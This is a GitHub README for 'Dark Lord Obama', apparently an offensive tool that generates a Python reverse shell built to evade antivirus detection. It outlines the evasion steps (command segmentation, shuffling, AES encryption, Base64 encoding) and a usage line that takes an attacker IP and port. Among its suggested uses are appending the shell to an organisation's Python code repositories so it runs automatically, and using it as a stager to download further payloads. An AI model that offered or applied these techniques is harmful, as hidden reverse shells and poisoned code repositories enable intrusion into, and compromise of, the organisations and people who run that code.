Skip to content

AV-evading Pythonic Reverse Shell with Dynamic Adaption Capabilities

Notifications You must be signed in to change notification settings

tanc7/dark-lord-obama

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Dark Lord Obama will now be transitioned into Google Golang

The Python 2 to 3 transition was a clusterfuck, a atomic blast of breakage. https://lwn.net/Articles/843660/

It pisses me off, because my code worked PERFECTLY. But now PyPi won't properly install dependencies required for this to work. Even manually installing PyCrypto will through errors https://pypi.org/project/pycrypto/#files.

And I am not a big fan of half-assed hacks to fix things that should have been supported via some sort of compatibility.

Everyone, please move on along to the successor of DarkLordObama, EXOCET-Antivirus-Evasion. https://github.com/tanc7/EXOCET-AV-Evasion

Python is not IMO a programming language. It's a scripting language because it runs through a interpreter built primarily on C and various other languages.

Golang on the other hand, can be cross-compiled across multiple platforms with minimum modifications from a single codebase, usually for compatibility issues with the target operating system. But the point is, Golang WORKS.

I am planning to add inline assembly execution via Golang, which is considered impossible, but watch me do it. I will do it!

Dark Lord Obama - Undetectable Pythonic Payload Generator

Chang Tan Lister Lister Unlimited Cybersecurity Solutions, LLC. changtan@listerunlimited.com

DLO generates a Pythonic reverse shell that as of July 29th, 2019, is undetectable on VirusTotal. It combines multiple won't-to-be-disclosed techniques (undiscloseable in detail) including but not limited to:

  1. "Command Segmentation"
  2. "AES Encryption" with a 32-bit key and a 16-bit initialization vector
  3. Base64 Encoding - It was a necessity
  4. Inline Python exec() functions, C asm() functions (will be added soon), Java/Jython, Cython, Ctypes

Dark Lord Obama Official Release Demo

Please click this link for a demostration video of how to use

Demo Video

Suggested Uses

Currently you can, after you gain a foothold in organization

  1. Run the payload standalone.
  2. Replace the proof-of-concept code with a Metasploit python payload
  3. Taint/corrupt Python repositories: Locate the Python code repositories of a organization during a pentest and then copy-paste the entire code and append it to the bottom of the python module, guarantee auto-execution of the reverse shell when the code runs
  4. Use the payload as a stager to download additional payloads
  5. Use the payload against MacOS (MacBooks, iMacs, etc). They natively run Python 2.7.1

Run it as python darklordobama.py <attacker IP> <attacker listening port>

How does it work?

First it chops up your payload into two-character segments, "Command Segmentation)

A ArrayMap is produced to allow the payload to reconstitute itself

The payload is then shuffled into a list array and then encrypted with AES-128

The encrypted payload is encoded in Base64 format